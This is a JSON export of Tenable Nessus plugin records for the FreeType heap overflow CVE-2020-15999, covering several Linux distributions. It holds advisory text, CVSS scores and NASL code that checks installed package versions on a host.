"https://www.tenable.com/plugins/nessus/147370", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2021-0013. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147370);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : freetype Vulnerability (NS-SA-2021-0013)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has freetype packages installed that are affected\nby a vulnerability:\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2021-0013\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL freetype packages. Note that updated packages may not be available yet. Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nflag = 0;\n\npkgs = {\n 'CGSL CORE 5.04': [\n 'freetype-2.8-14.el7_9.1',\n 'freetype-debuginfo-2.8-14.el7_9.1',\n 'freetype-demos-2.8-14.el7_9.1',\n 'freetype-devel-2.8-14.el7_9.1'\n ],\n 'CGSL MAIN 5.04': [\n 'freetype-2.8-14.el7_9.1',\n 'freetype-debuginfo-2.8-14.el7_9.1',\n 'freetype-demos-2.8-14.el7_9.1',\n 'freetype-devel-2.8-14.el7_9.1'\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:45:50", "description": "According to the version of the freetype package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.9.1 : freetype (EulerOS-SA-2021-1598)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:freetype", "cpe:/o:huawei:euleros:uvp:2.9.1"], "id": "EULEROS_SA-2021-1598.NASL", "href": "https://www.tenable.com/plugins/nessus/147508", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147508);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"EulerOS Virtualization 2.9.1 : freetype (EulerOS-SA-2021-1598)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the freetype package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior\n to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML\n page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1598\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cc62e1ef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.9.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.9.1\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.9.1\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"freetype-2.10.1-1.h1.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:45:23", "description": "According to the version of the freetype package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-11T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.9.0 : freetype (EulerOS-SA-2021-1652)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:freetype", "cpe:/o:huawei:euleros:uvp:2.9.0"], "id": "EULEROS_SA-2021-1652.NASL", "href": "https://www.tenable.com/plugins/nessus/147677", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147677);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"EulerOS Virtualization 2.9.0 : freetype (EulerOS-SA-2021-1652)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the freetype package installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior\n to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML\n page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1652\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?827ccf98\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.9.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.9.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.9.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"freetype-2.10.1-1.h1.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:38:20", "description": "Update to freetype 2.10.4 which fixes security flaw CVE-2020-15999.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-10-26T00:00:00", "type": "nessus", "title": "Fedora 32 : freetype (2020-6299161e89)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:freetype", "cpe:/o:fedoraproject:fedora:32"], "id": "FEDORA_2020-6299161E89.NASL", "href": "https://www.tenable.com/plugins/nessus/141907", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-6299161e89.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141907);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"FEDORA\", value:\"2020-6299161e89\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Fedora 32 : freetype (2020-6299161e89)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to freetype 2.10.4 which fixes security flaw CVE-2020-15999.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-6299161e89\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected freetype package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"freetype-2.10.4-1.fc32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-10T19:14:45", "description": "The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the ALSA-2020:4952 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-02-09T00:00:00", "type": "nessus", "title": "AlmaLinux 8 : freetype (ALSA-2020:4952)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:alma:linux:freetype", "p-cpe:/a:alma:linux:freetype-devel", "cpe:/o:alma:linux:8"], "id": "ALMA_LINUX_ALSA-2020-4952.NASL", "href": "https://www.tenable.com/plugins/nessus/157599", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# AlmaLinux Security Advisory ALSA-2020:4952.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157599);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"ALSA\", value:\"2020:4952\");\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"AlmaLinux 8 : freetype (ALSA-2020:4952)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AlmaLinux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the\nALSA-2020:4952 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.almalinux.org/8/ALSA-2020-4952.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype and / or freetype-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:freetype-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Alma Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AlmaLinux/release\", \"Host/AlmaLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/AlmaLinux/release');\nif (isnull(release) || 'AlmaLinux' >!< release) audit(AUDIT_OS_NOT, 'AlmaLinux');\nvar os_ver = pregmatch(pattern: \"AlmaLinux release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'AlmaLinux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'AlmaLinux 8.x', 'AlmaLinux ' + os_ver);\n\nif (!get_kb_item('Host/AlmaLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' 